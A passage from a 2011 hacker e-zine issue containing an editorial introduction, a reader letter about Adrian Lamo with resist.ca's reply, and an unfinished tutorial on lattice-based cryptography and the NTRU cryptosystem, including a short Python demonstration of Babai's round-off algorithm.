0x01 Introduction                          || 0x08 MapReduce, Part 2           elchupathingy
0x02 Feedback + Edits                      || 0x09 Cameras + DVRs Scan         storm
0x03 Lattice-Based Cryptography    rattle  || 0x0a 303-833-00xx Scan           Shadytel, Inc
0x04 duper's Code Corner           duper   || 0x0b bit.ly Shenanigans          Silks, elchupa
0x05 The Tech Behind Credit Cards  K141    || 0x0c Programming Challenge       storm
0x06 Brief Notes on Kiosk Hacking  storm   || 0x0d The Scoop on LIGATT
0x07 Linux Rootkit Dev Update      duper   || 0x0e Et Cetera, Etc.             teh crew

[==================================================================================================]
                         [================================================]
                                    Go Null Yourself E-Zine
                                Issue #4 - Spring/April 2011
                                   www.GoNullYourself.org
                          "It makes sense if you don't think about it"
                         [================================================]
[==================================================================================================]
-=[ 0x01 Introduction

Ahoy there, and welcome to issue #4 of GNY Zine - just in time for spring! The sun is shining, the
birds are chirping, and with the advent of laptops, now all you little h4xx0rs have no excuse not to
go outside! For those who still prefer the cool depths of a basement, though, GNY Zine has all you
need in lieu of vitamin D and a social life. Like crypto! And rootkits! And leet ASCII art!

We may not have iced tea, but here's a recipe to make up for it:

  * 8 cups water
  * 3 orange pekoe tea bags
  * 3/4 cup SPLENDA® No Calorie Sweetener, Granulated
  * 1/2 cup lemon juice

  1. In a large saucepan, heat water to a rapid boil. Remove from heat and drop in the tea bags.
     Cover and let steep for 1 hour.
  2. In a large pitcher, combine the steeped tea and the SPLENDA® Granulated Sweetener. Stir until
     dissolved, then stir in lemon juice. Refrigerate until chilled.

Hey, it got quite a few good reviews and only has 11 Calories.

Anyways, don't want to keep you. Those 3100 lines below aren't gonna read themselves. Enjoy the
zine, and see ya in the summer.
Notable Events
==============

January 2011      - Leak of LIGATT Security/Gregory D. Evans
January 31, 2011  - Go Null Yourself turns 3-years-old
February 3, 2011  - Exhaustion of remaining IPv4 address space
February 2011     - Leak of HBGary, Inc.

-=-=-

Now, on to formalities...

If you are interested in submitting content for future issues of GNY Zine, we would be happy to
review it for publication. Content may take many forms, whether it be a paper, review, scan, or
first-hand account of an event. Submissions of ASCII cover art that display the GNY logo in some
way are also appreciated. Well-received topics include computer hacking and exploitation methods,
programming, telephone phreaking (both analog and digital), system and network exploration, hardware
hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering.
We are also receptive to content relating to concrete subjects such as science and mathematics,
along with more abstract subjects such as psychology and culture. Both technical and non-technical
material is accepted.

Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent
via:

  - IRC private message (storm, m0nkee, or Barney- @ irc.gonullyourself.org #gny)
  - Email (zine@gonullyourself.org)

If there is enough feedback, we will publish some of the messages in future issues. Our PGP key is
available for use below.

We have put a lot of effort into this publication and hope that you learn something from reading
it. Abiding by our beliefs, any information within this e-zine may be freely re-distributed,
utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless
citing certain passages) and give credit to the original authors when and where necessary.

Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or
damage that may result from the information presented within this publication. Although people will
be people and act in idiotic fashions, we do not condone, promote, or participate in illegal
behavior in any way.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.11 (GNU/Linux)

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
8QJQ4gF00KrsCCSrPyg/cZ5G
=g7oJ
-----END PGP PUBLIC KEY BLOCK-----
[==================================================================================================]

-=[ 0x02 Feedback and Edits

We always strive to publish accurate information in GNY Zine, but we the authors and editors are in
fact human beings and are subject to making mistakes from time to time, despite our best efforts.
The publication, compilation, and distribution of this e-zine is derived entirely from our passion
for technology and curiosity about how things tick. GNY Zine has no commercial influences. If you
find that there is an error in content that we have published, please do not hesitate to email us so
that it may be announced and corrected in the next issue. Not acting like a stuck-up elitist about
it will probably invoke a more positive response too.

With that being said, we are also receptive to content or personal experiences relevant to
information presented in past issues. If you've written some code, applied a concept in a new way,
or just want to voice your opinion about a topic, send us an email!

We may be contacted at: zine@gonullyourself.org
(PGP key is available in the Introduction)

Please note that emails we like will be published in future issues, so specify if you wish for your
message to remain private or if you wish for us to redact certain personal information from it.

----------------------------------------------------------------------------------------------------
Turning Manning into the Feds turns an institution with relatively
unlimited power against Manning. The techniques used by Lamo were a
betrayal of trust given (arguably without having been earned) to Lamo.
Lamo is a snitch by definition. The fact that he still has hosting
on domains like resist.ca is further evidence that resist.ca can not
be trusted as an anarchist resource.

The panel at HOPE in which Lamo was confronted framed the hacker
community as one that is filled with snitches. Members of the panel
told stories about how they were turned in by people they collaborated
with and trusted. Behavior like this closes doors to the flow of
information, welcomes the violence of authoritarian institutions, and
sets the foundation for the privatization of security research.

Behavior like Lamo's is in opposition to the safety and values of the
hacker community, and as a result should not be allowed space.
Idolizing individuals who act with such a disregard for the hacker
community they claim to be a part of with a glowing exposé is a
disgrace to the hacker community.

With disgust,
evoltech

>> Thanks for sending us your opinion. Though, we checked and it seems like Adrian's website is
>> currently 404'ing (for those of you who didn't read the interview from issue #2, the URL is
>> http://users.resist.ca/~adrian/). We actually followed up on this and contacted resist.ca about
>> it, who replied:

Hi there,

Sorry we haven't responded to you yet about your question about Adrian Lamo's website on resist.ca.
We removed his various accounts because his motivations seem to be in conflict with ours (see
http://www.youtube.com/watch?v=ebLahUUr__s). Our project is politically motivated and we offer
services to projects that share our political alignment. Adrian's activities around the wikileaks
debacle suggest to us that he doesn't actually align with us politically.

For more information on the kinds of political activism we support, please read our mission
statement at http://resist.ca/mission and our basis of unity at http://resist.ca/basis

--The resist.ca collective

>> So, there you go.
[==================================================================================================]

-=[ 0x03 Lattice-Based Cryptography
-=[ Author: rattle
-=[ Website: http://www.awarenetwork.org/

                           p o s t - q u a n t u m
                        A Lattice-Based Crypto System
                            rattle // born // tobi

-- 0 Requirements --------------------------------------------------------------

I will expect readers to have a basic grasp of (linear) algebra. The terms I
will use without further explanation are the following:

  - vector
  - linear independence
  - matrix
  - rank of a matrix
  - transpose of a matrix
  - scalar products
  - quotient rings Z(q) = { 0, ..., q-1 }
    (where all operations are performed modulo q)

I also expect the reader to have a certain idea of computational complexity, if
even only the roughest. You should have heard of the following notions:

  - Big-O notation (Landau symbols)
  - Time/Space complexity of an algorithm

I really can not give a complete introduction to these topics here. I would
recommend literature, but all the undergraduate books on these topics that I
know are in German.

---- 0.1 Notation --------------------------------------------------------------

When A is some (n x m)-matrix (this means it has n rows and m columns), then
the entry in the i-th row and j-th column is denoted by A[i,j]. Similarly,
if a is a vector (which is just an (n x 1)-matrix), we will denote the i-th
entry of this vector by a[i]. The transpose of a matrix A is denoted by A°.
The canonical basis of real space will be denoted by e(1), ..., e(n); these are
the vectors defined by e(i)[j] = 1 if i = j and e(i)[j] = 0 otherwise.

We will denote the real numbers by R and the integers by Z. The notation X^n is
to be read as "X to the n" and denotes the Cartesian power if X is a set;
otherwise it means multiplying X with itself n times, duh. In real space, if a
and b are vectors, we denote by

  <a,b> = a[1]·b[1] + ··· + a[n]·b[n]

the Euclidean scalar product.

-- 1 Introduction --------------------------------------------------------------
Given linearly independent vectors B[1], ..., B[n] in R^n, the lattice spanned
by these vectors is the set

  L = { a[1]·B[1] + ... + a[n]·B[n] | a in Z^n }

of all integer linear combinations of them. Figure 1 shows an example in R^2:
each lattice point is marked by an x, and the 'grid' of the lattice has been
ASCII-modelled for your convenience.

  [Figure 1: Example of a two-dimensional lattice (ASCII plot not reproduced).
   It is the lattice spanned by a = (4,1) and b = (1,2), which reappears in
   Figure 2; lattice points are marked x on an 18 x 7 grid.]

Now consider Figure 2, which adds a "target" vector (marked €) that is not a
lattice point, together with a circle around it that passes through the closest
lattice point, p = (5,3) in this case.

  [Figure 2: Lattice with target vector (ASCII plot not reproduced). It marks
   the target € next to its closest lattice point p = (5,3), and labels the
   lattice points a = (4,1), b = (1,2), c = (18,1) and d = (7,0) that are used
   as basis vectors below.]

Using the basis a = (4,1) and b = (1,2), it is easy to see that p = a + b. On the
other hand, using the basis c = (18,1) and d = (7,0) of the very same lattice,
the same point has the less obvious description p = 3·c - 7·d. When passing to
higher dimensions, this phenomenon escalates drastically: with a "bad" basis the
coordinates of nearby lattice points become huge and rounding a target to a
lattice point no longer finds the closest one. This way, we obtain a
computational problem that varies from easy to virtually impossible to solve,
depending very much on the lattice basis used.
---- 1.1 Lattice Problems ------------------------------------------------------

Let L be a lattice and g some real value greater than or equal to one. We denote
by d(x,y) the Euclidean distance from the point x to the point y. The lattice
approximation problems are the following:

CLOSEST VECTOR PROBLEM -- CVP(g):
For a target vector t in R^n, let y be the lattice point closest to t. The task
is to find a lattice point x such that d(x,t) is less than or equal to g·d(y,t).
In other words, x is no further from t than g times the distance from t to the
nearest lattice point.

SHORTEST VECTOR PROBLEM -- SVP(g):
Find a nonzero lattice vector x that is no longer than g times the shortest
nonzero lattice vector. This is essentially the CVP with the origin t = (0,...,0)
as target, except that the origin itself (which is always a lattice point) is
excluded as an answer.

We also write SVP = SVP(1) and CVP = CVP(1) for the non-approximative problems.

---- 1.2 Lattice-based Encryption: Breakdown -----------------------------------

Based on these problems, we can build an asymmetric cryptosystem, which is
roughly described as follows:

  a) Choose a random "good" basis and keep it as a private key.
  b) Hand out a "bad" basis for the same lattice as a public key.
  c) Somehow find a way to encode your messages as lattice points.
  d) Encrypt a lattice point by simply distorting it randomly by a small vector.
  e) Decryption now means finding the lattice point closest to the distorted
     vector (because that was the original message). This is an instance of the
     CVP, which should only be feasible when in possession of a "good" basis.
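To make the "good basis decrypts, bad basis does not" claim of steps a), b) and e) concrete, here is
an added example (not code from the article) in Python. It runs Babai's round-off algorithm, the
simplest CVP heuristic (write the target in the basis, round every coordinate to the nearest
integer, map back), on the lattice of Figures 1 and 2 with both bases. The vectors a, b, c, d and
p are the ones from the text; the target t = (5.4, 3.3) is a constructed value placed near p = (5,3).
The Hadamard ratio |det B| / (|B[1]|·|B[2]|) is used as a rough measure of how "good" a basis is (1
for an orthogonal basis, close to 0 for a very skewed one).

```python
from fractions import Fraction as Fr
from math import hypot

# The two bases of the lattice from Figures 1 and 2 (columns are the vectors).
GOOD = ((4, 1), (1, 2))    # a, b
BAD = ((18, 1), (7, 0))    # c, d


def det2(B):
    """Determinant of the 2x2 matrix with columns B[0], B[1]."""
    (a1, a2), (b1, b2) = B
    return a1 * b2 - a2 * b1


def coords(B, t):
    """Exact coordinates x with x[0]*B[0] + x[1]*B[1] = t (Cramer's rule)."""
    (a1, a2), (b1, b2) = B
    D = Fr(det2(B))
    return (Fr(t[0] * b2 - t[1] * b1) / D, Fr(a1 * t[1] - a2 * t[0]) / D)


def combine(B, x):
    """The lattice point x[0]*B[0] + x[1]*B[1]."""
    return tuple(x[0] * B[0][k] + x[1] * B[1][k] for k in range(2))


def same_lattice(B1, B2):
    """B2 spans the same lattice as B1 iff each B2 vector has integer
    coordinates in B1 and the change-of-basis matrix has determinant +-1."""
    cs = [coords(B1, v) for v in B2]
    if not all(c.denominator == 1 for x in cs for c in x):
        return False
    return abs(det2(tuple(tuple(int(c) for c in x) for x in cs))) == 1


def hadamard_ratio(B):
    """|det B| / (|B[0]| * |B[1]|): 1 for orthogonal vectors, near 0 when the
    basis is badly skewed."""
    return abs(det2(B)) / (hypot(*B[0]) * hypot(*B[1]))


def babai_round_off(B, t):
    """Babai's round-off: express t in basis B, round each coordinate to the
    nearest integer and return the corresponding lattice point."""
    x = tuple(int(round(c)) for c in coords(B, t))
    return combine(B, x)


def dist(u, v):
    return hypot(u[0] - v[0], u[1] - v[1])


if __name__ == "__main__":
    t = (Fr(54, 10), Fr(33, 10))   # constructed target next to p = (5,3)
    print("same lattice:", same_lattice(GOOD, BAD))
    print("p = a + b   ->", combine(GOOD, (1, 1)))
    print("p = 3c - 7d ->", combine(BAD, (3, -7)))
    for name, B in (("good", GOOD), ("bad", BAD)):
        v = babai_round_off(B, t)
        print(f"{name} basis: Hadamard ratio {hadamard_ratio(B):.3f}, "
              f"round-off gives {v}, distance to t {dist(v, t):.2f}")
```

With the good basis the round-off lands on p = (5,3), about 0.5 away from t. With the bad basis the
coordinates of t are (3.3, -7.71); rounding gives 3·c - 8·d = (-2, 3), more than 7 away from t even
though the two bases describe exactly the same set of points. That gap between the two bases is what
step e) relies on.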
---- 1.3 Analysis of SVP -------------------------------------------------------

We now give a brief historical analysis of the hardness of the SVP(g). One
should note here that the CVP(g) is at least as hard as the SVP(g), therefore it
would suffice if the SVP(g) was hard to solve. And indeed, from the algorithms
known so far, it seems that we can either achieve a polynomial runtime or a
polynomial approximation factor, but not both:

  +--------+--------------+--------+-------------------------------------+
  | g      | Runtime      | Space  | Reference                           |
  +--------+--------------+--------+-------------------------------------+
  | 1      | 2^O(n)       | 2^O(n) | [JHLW11, Combinatorial SVP-Solver]  |
  | 1      | 2^O(n log n) | poly   | [Kan83]                             |
  | poly   | 2^O(n)       | 2^O(n) | [MR09]                              |
  | 2^O(n) | poly         | poly   | [LLL82]                             |
  +--------+--------------+--------+-------------------------------------+

This has led to the following conjecture:

Conjecture 1.1. There is no polynomial time algorithm that approximates
lattice problems to within polynomial factors.

As far as exponential-time exact solvers are concerned, they have become
practical even for small instances only in recent years:

  +------+-------------------------+----------+-----------+
  | Year | Authors                 | Time     | Space     |
  +------+-------------------------+----------+-----------+
  | 2001 | Ajtai, Kumar, Sivakumar | 2^O(n)   | 2^O(n)    |
  | 2004 | Regev                   | 2^(16n)  | 2^(8n)    |
  | 2008 | Nguyen, Vidick          | 2^(5.9n) | 2^(3n)    |
  | 2010 | Pujol, Stehlé           | 2^(2.5n) | 2^(1.2n)  |
  +------+-------------------------+----------+-----------+

One should note, however, that lattice reduction methods such as [LLL82] seem to
perform better in practice than their theoretic worst-case guarantees suggest.
This is not fully explained yet, but has experimental evidence: in [GN08],
different algorithms and several distributions on lattices were compared, with
the result that they provide an approximation ratio of roughly g = d^n where d
is close to 1.012. Still, it seems that approximation ratios of (1.01)^n are
outside the reach of known lattice reduction algorithms. We should note that for

  g > \sqrt{ n / \log n }

the SVP(g) is not NP-hard unless the polynomial time hierarchy collapses (you
should read this as "is not NP-hard"). However, it was shown in [Ajt98] that the
exact SVP = SVP(1) actually is NP-hard (under randomized reductions).
Furthermore, there are no quantum algorithms known that perform better than the
classical ones. Because of this, lattice-based cryptography is often labelled
"post-quantum" cryptography. In summary, we may very well assume that the SVP is
a hard problem.
-- 2 NTRU ----------------------------------------------------------------------

We will now present a practical implementation of the rough idea presented in
subsection 1.2. For the mathematically inclined, a detailed explanation of why
the encryption scheme really works the way we outlined in 1.2 can be found in
[JHLW11].

---- 2.1 Mathematical Necessities ----------------------------------------------

We first require a couple of mathematical definitions and results, since NTRU
operates on a very special kind of lattice.

Definition 2.1. Let Z(q) = {0,...,q-1} be the integers from 0 to q-1, with all
operations performed modulo q. For an integer n we write (n mod q) for its
remainder in Z(q), and when A is a matrix (or vector) with integer entries, we
write (A mod q) for the matrix with entries in Z(q) obtained by reducing every
entry modulo q.

Definition 2.2. Let v in R^n be a vector and A an (n x n)-matrix. We define
(A*v) to be the (n x n)-matrix whose j-th column is A^(j-1)·v, i.e. the result
of applying A exactly (j-1) times to v:

  (A*v) = \begin{pmatrix} v & A v & A^2 v & \cdots & A^{n-1} v \end{pmatrix},
  so that (A*v)[i,j] = (A^(j-1)·v)[i].

We also define the special (n x n)-matrix T that rotates a vector down by one
position, T·e(i) = e(i+1) for i < n and T·e(n) = e(1). Written out, T has ones
on the subdiagonal and in the top-right corner and zeros elsewhere:

  T = \begin{pmatrix}
        0      & 0      & \cdots & 0      & 1 \\
        1      & 0      & \cdots & 0      & 0 \\
        0      & 1      & \ddots & \vdots & \vdots \\
        \vdots & \ddots & \ddots & 0      & 0 \\
        0      & \cdots & 0      & 1      & 0
      \end{pmatrix},
  so that (T·v)[i] = v[i-1], with indices taken modulo n.

We will make frequent use of the matrix (T*v), whose j-th column is just v
rotated down by j-1 positions, i.e. (T*v)[i,j] = v[i-j+1]. Such a matrix is
called circulant.

Lemma 2.3. For any two vectors f and g in R^n,

  1) (T*f)·g = (T*g)·f
  2) T·(T*f) = (T*f)·T
  3) (T*f)·(T*g) = (T*((T*f)·g))

Proof. For 1 <= k <= n consider the (k x k)-matrix I(k) with ones on the
anti-diagonal and zeros elsewhere (so I(k)·x reverses the order of the entries
of x), and the symmetric (n x n)-block matrices

  S(k) = \begin{pmatrix} I(k) & 0 \\ 0 & I(n-k) \end{pmatrix}.

Writing out the circulant matrix (T*g), we have

  (T*g)·f = \begin{pmatrix} g[1]   & g[n]   & \cdots & g[2] \\
                            g[2]   & g[1]   & \cdots & g[3] \\
                            \vdots & \vdots &        & \vdots \\
                            g[n]   & g[n-1] & \cdots & g[1] \end{pmatrix} f
          = \begin{pmatrix} <f, S(1)·g> \\ <f, S(2)·g> \\ \vdots \\ <f, S(n)·g> \end{pmatrix}
          = \begin{pmatrix} <S(1)·f, g> \\ <S(2)·f, g> \\ \vdots \\ <S(n)·f, g> \end{pmatrix}
          =: h,

where the last equality holds because every S(k) is symmetric. Repeating the
computation with the roles of f and g exchanged gives (T*f)·g = h as well. This
proves part (1) already. For the second statement we calculate (all index
operations are performed modulo n):

  <S(i-1)·f, T^j·g>
    = \sum_{k=1}^{n} (S(i-1)·f)[k] · (T^j·g)[k]
    = \sum_{k=1}^{i-1} f[i-k]·g[k-j] + \sum_{k=i}^{n} f[n+i-k]·g[k-j]
    = \sum_{k=2}^{i} f[i-k+1]·g[k-j-1] + \sum_{k=i+1}^{n+1} f[n+i-k+1]·g[k-j-1]
    = \sum_{k=1}^{i} f[i-k+1]·g[k-j-1] + \sum_{k=i+1}^{n} f[n+i-k+1]·g[k-j-1]
    = <S(i)·f, T^(j+1)·g>,

which yields

  T · \begin{pmatrix} <S(1)·f, T^(j-1)·g> \\ <S(2)·f, T^(j-1)·g> \\ \vdots \\ <S(n)·f, T^(j-1)·g> \end{pmatrix}
    = \begin{pmatrix} <S(n)·f, T^(j-1)·g> \\ <S(1)·f, T^(j-1)·g> \\ \vdots \\ <S(n-1)·f, T^(j-1)·g> \end{pmatrix}
    = \begin{pmatrix} <S(1)·f, T^j·g> \\ <S(2)·f, T^j·g> \\ \vdots \\ <S(n)·f, T^j·g> \end{pmatrix}.

By part (1), the vector with entries <S(i)·f, T^j·g> is (T*(T^j·g))·f =
(T*f)·T^j·g, the (j+1)-th column of (T*f)·(T*g). So the display says

  T·(T*f)·T^(j-1)·g = (T*f)·T^j·g

for every g and every j; with j = 1 this is T·(T*f) = (T*f)·T, which is part
(2). Iterating it, the j-th column of (T*f)·(T*g) is

  (T*f)·T^(j-1)·g = T^(j-1)·(T*f)·g = T^(j-1)·h = (T*h)_j,

the j-th column of (T*h). Hence (T*f)·(T*g) = (T*h) = (T*((T*f)·g)), which is
part (3).                                                                q.e.d.

Definition 2.4. Let n and d be positive integers with 2d+1 <= n. A vector f in
Z^n is called a d-vector if it has exactly d negative and d+1 positive entries
(and hence n-2d-1 entries equal to zero).
---- 2.2 The NTRU Cryptosystem -------------------------------------------------

We can now describe the process of key generation for the NTRU cryptosystem:

________________________________________________________________________________
Algorithm 1: NTRU-KEY-GENERATION
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Input:  A prime number n, a "modulus" q, a "weight bound" d and an integer p < q.
Output: A private key (f,g) in Z^(2n) and a public key h in Z(q)^n.
________________________________________________________________________________
 1: CHOOSE two d-vectors f' and g in {p,0,-p}^n randomly
 2: SET f := f' + e(1)
 3: IF ((T*f) mod q) is not invertible THEN
 4:     GOTO 1
 5: SET h := (T*f)^(-1) · g mod q
 6: RETURN (f,g) and h
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

The number q is called the modulus because we operate modulo q; the reason why
we call d the "weight bound" will become apparent later. Note that the inverse
in step 5 is again a circulant matrix by Lemma 2.3, so h is determined by a
single vector. From the choice of the vectors f and g in the algorithm, we
immediately obtain the following result:

Proposition 2.4. Let (f,g) and h be a key pair generated by Algorithm 1. Then

  (T*f) mod p = I   and   (T*g) mod p = 0,

because every entry of f' and g is a multiple of p and f = f' + e(1).

Let us now take a look at the encryption and decryption routines:

________________________________________________________________________________
Algorithm 2: NTRU-ENCRYPTION
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Input:  A prime number n, a modulus q, a weight bound d, a public key h, and a
        d-vector m in {1,0,-1}^n encoding the message.
Output: A ciphertext c in Z(q)^n.
________________________________________________________________________________
 1: CHOOSE a d-vector r in {1,0,-1}^n randomly
 2: RETURN c := m + (T*h)·r mod q
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

This encryption routine works exactly as step d) in 1.2: we choose a random
"distortion" vector r and distort the message by (T*h)·r. The result is our
ciphertext.

________________________________________________________________________________
Algorithm 3: NTRU-DECRYPTION
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Input:  A prime number n, a modulus q, a weight bound d, an integer p < q,
        the private key (f,g) in Z^(2n) (only f is used) and a ciphertext c
        in Z(q)^n.
Output: The plaintext message m in {1,0,-1}^n
________________________________________________________________________________
 1: SET v := (T*f)·c mod q
 2: FOR i=1 TO n DO
 3:     CHOOSE the integer t with (t mod q) = v[i] and |t| minimal, i.e. the
        representative of v[i] in the interval (-q/2, q/2]
 4:     SET v[i] := the representative of (t mod p) with smallest absolute
        value (for p = 3 this lies in {1,0,-1})
 5: RETURN v
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

It is not yet clear why the decryption routine actually recovers the plaintext
from a given ciphertext - and in fact, it doesn't do so for every choice of
parameters:

Proposition 2.5. With a parameter choice satisfying

  8dp + 4p + 2 < q,                                                         (#)

the NTRU cryptosystem decrypts every ciphertext correctly.

Proof. Assume that c is a ciphertext generated by NTRU-ENCRYPTION. Then, by
Lemma 2.3 (3),

  (T*f)·c = (T*f)·m + (T*f)·(T*h)·r = (T*f)·m + (T*((T*f)·h))·r

modulo q. Since h = (T*f)^(-1)·g mod q, we have (T*f)·h = g mod q, and so

  (T*f)·c mod q = ((T*f)·m + (T*g)·r) mod q.

Note that v := (T*f)·m + (T*g)·r is a vector with integer entries. If the
absolute values of all its entries are smaller than q/2, the loop in steps 2 to
4 of NTRU-DECRYPTION recovers the integer vector v itself and NOT just its
residue modulo q. By Proposition 2.4, this then means

  v mod p = ((T*f)·m + (T*g)·r) mod p = I·m + 0·r = m,

and since the entries of m already lie in {1,0,-1}, the reduction in step 4
returns m exactly. Hence, let us inspect the vector v more closely. Its i-th
entry is given by

  v[i] = \sum_{j=1}^{n} ( (T*f)[i,j]·m[j] + (T*g)[i,j]·r[j] )
